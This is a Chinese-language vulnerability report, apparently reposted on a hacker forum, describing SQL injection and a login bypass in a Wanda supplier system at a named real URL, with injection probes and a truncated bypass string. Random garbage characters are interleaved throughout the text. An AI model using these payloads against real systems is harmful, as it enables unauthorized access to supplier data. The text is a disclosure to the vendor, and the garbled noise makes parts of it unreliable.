万达供应商系统SQL注射漏洞

admin

简要描述：万达某分站sql注入。敏感信息泄露。
' T; |5 h0 H: \. f) |详细说明：
8 G4 W5 T8 m; `/ b. d7 v; q万达scm系统登陆框sql注入。

http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
, j$ Z2 C9 a" L/ A% m% D
. J) W( m8 ]! M% j4 p
500错误。
$ g) M" R+ X7 C6 U
用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
/ F7 l' Y2 N9 \+ o5 f/ i截图有一点问题，用户名，和密码输入' and 1=1 --可以得到相同的提示，可自测。）
- o" r- c: ]! ]* y+ Z2 t& t经过分析，登陆验证的过程应该是：

+ c, g9 c1 C- ?3 I1 a  a取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
1 C. v5 [  x! p) ?7 z
oracle数据库，存在注入点。@大连万达，你怎么看？
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png

& f3 Q+ {+ I9 r& z系统里有万达的供应商资料什么的,提交数据的地方随便输入'，提交500错误。没深入。目测可shell。
+ y4 W4 _9 S6 {( E3 |0 `7 @3 O漏洞证明：
, B- h# O+ U) Y3 v万达scm系统登陆框sql注入。

http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27

% T0 b2 `1 ?/ T* ]0 q
500错误。
1 ?, w, f; d; o
用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
8 U: z% @! f5 c3 g" rhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png
3 D4 a+ S* ]( P* l9 e: x0 b5 y
$ t8 I3 ]: Y; U& ^. s
' `, H+ Q. J4 W' `（截图有一点问题）

怎么饶都饶不过去；经过分析，登陆验证的过程应该是：

" b9 q  J) u0 n: p! B. n取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
. x3 P4 k# ~' i
( t, Z3 ?2 h2 F绕过：
8 O  C1 _% Y3 j) f2 s4 I6 E; ]" e* Xhttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1

* R  C' c9 }7 k+ g  \5 f
oracle数据库，存在注入点。@大连万达，你怎么看？
​系统里有万达的供应商资料什么的，有发布公告，没深入。目测可shell。

9 R# a0 [6 v" Q4 D) [修复方案：
# \6 S9 S! ^5 I* x; B) G3 n。。。
' ~& k  c9 W; v# m2 h' I

* n8 o5 s+ o  |# i& U+ V: ^厂商已经确认

[/td][/tr]
( c( I3 B! H2 B% N0 A& e4 f[/table]
7 C- D2 y" j% Y; \( ]# {
: |5 S6 g: w; q5 q0 Z; d  H
5 g$ R/ L3 V- F# n* d# g- s